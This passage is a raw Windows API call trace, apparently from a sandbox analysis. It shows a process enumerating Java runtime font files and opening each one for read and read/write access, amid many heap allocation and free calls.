HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.874] AreFileApisANSI () returned 1 [0096.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82688 [0096.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 68 [0096.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13bd8)) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0096.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.874] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5434c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LucidaBrightRegular.ttf", cAlternateFileName="LUCIDA~4.TTF")) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0096.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0096.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0096.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0096.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0096.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0096.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0096.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0096.875] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.875] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.875] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.875] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0096.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0096.875] AreFileApisANSI () returned 1 [0096.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf", lpUsedDefaultChar=0x0) returned 69 [0096.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0096.875] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.875] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0096.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.876] AreFileApisANSI () returned 1 [0096.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0096.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0096.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 69 [0096.876] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.880] GetFileType (hFile=0x360) returned 0x1 [0096.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0096.881] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.881] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.881] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.881] CloseHandle (hObject=0x360) returned 1 [0096.881] AreFileApisANSI () returned 1 [0096.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0096.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0096.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 69 [0096.881] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.881] GetFileType (hFile=0x360) returned 0x1 [0096.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0096.882] CloseHandle (hObject=0x360) returned 1 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0096.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.883] AreFileApisANSI () returned 1 [0096.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0096.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 69 [0096.883] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5434c)) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0096.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.883] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4d9c8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LucidaSansDemiBold.ttf", cAlternateFileName="LU38C7~1.TTF")) returned 1 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0096.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0096.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0096.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0096.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0096.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.884] AreFileApisANSI () returned 1 [0096.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf", lpUsedDefaultChar=0x0) returned 68 [0096.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0096.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0096.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.884] AreFileApisANSI () returned 1 [0096.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0096.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82058 [0096.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 68 [0096.884] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.885] GetFileType (hFile=0x360) returned 0x1 [0096.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0096.885] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.885] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.885] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.885] CloseHandle (hObject=0x360) returned 1 [0096.885] AreFileApisANSI () returned 1 [0096.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0096.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82448 [0096.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x82448, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 68 [0096.885] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.886] GetFileType (hFile=0x360) returned 0x1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82448 | out: hHeap=0x20000) returned 1 [0096.886] CloseHandle (hObject=0x360) returned 1 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 